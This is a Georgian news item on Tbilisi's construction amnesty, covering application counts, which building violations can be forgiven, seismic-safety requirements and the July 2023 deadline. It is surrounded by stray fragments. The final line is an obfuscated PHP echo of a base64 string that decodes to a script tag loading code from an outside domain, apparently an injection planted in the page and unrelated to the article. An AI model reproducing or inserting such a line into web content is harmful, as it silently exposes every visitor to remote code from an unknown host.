celsiusi
ავერსი შნაიდერი

სამშენებლო ამნისტიის ფარგლებში, თბილისის მუნიციპალური ინსპექციის მიერ 340 ობიექტი იქნა მიღებული ექსპლუატაციაში.

„ამნისტიის გამოცხადებიდან სამსახურში 1124 განცხადება შემოვიდა; ამ დროისთვის შესწავლის პროცესშია 196 ობიექტი; არასრულყოფილი დოკუმენტაციის გამო შუალედური პასუხი გაეგზავნა 434 განმცხადებელს, 78-ს კი უარი ეთქვა; დოკუმენტაციის წარმოუდგენლობის გამო განუხილავი დარჩა 76 განაცხადი“, – აცხადებენ უწყებაში.

თბილისის მუნიციპალური ინსპექციის ინფორმაციით, სამშენებლო ამნისტია ეხება ყველა ტიპის მშენებლობას, მეორედან მეოთხე კლასის ჩათვლით, რომელიც მიმდინარეობდა ნებართვის საფუძველზე და მშენებლობა დასრულებულია 2020 წლის 18 აგვისტომდე. აგრეთვე, იმ ობიექტებს, რომლებზეც მშენებლობის ნებართვა გაცემული არ არის, თუმცა იგი დამტკიცებული განაშენების რეგულირების გეგმის/განაშენიანების დეტალური გეგმის არეალშია განთავსებული.

„სამშენებლო ამნისტიის ფარგლებში ხდება ზოგიერთი სამშენებლო დარღვევის პატიება. მაგალითად, დარღვეულია K1, K2, K3 პარამეტრები, ავტოსადგომების რაოდენობა, სიმაღლის რეგულირების ხაზი, ფართობის გადამეტება, ფუნქციური ზონის დარღვევა და ა.შ. ამასთან, ობიექტი უნდა აკმაყოფილებდეს უსაფრთხოების ნორმებს. შესაბამისად, აუცილებელია, განმცხადებელმა წარმოადგინოს აკრედიტებული ინსპექტირების ორგანოს მიერ გაცემული დასკვნა კონსტრუქციულ მდგრადობასა და სეისმომედეგობაზე. სამშენებლო ამნისტიით სარგებლობისათვის დაინტერესებულ პირს, შეუძლია სპეციალური პლატფორმიდან ms.gov.ge ელექტრონული განცხადებით მიმართოს თბილისის მუნიციპალურ ინსპექციას“, – აღნიშნავენ თბილისის მუნიციპალურ ინსპექციაში.

სამშენებლო ამნისტია 2021 წლის 28 ივლისს შევიდა ძალაში და ორი წლის განმავლობაში იმოქმედებს. სამშენებლო ამნისტიაზე ახალი განცხადებების დარეგისტრირების ბოლო ვადა 2023 წლის 27 ივლისია. 
411
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");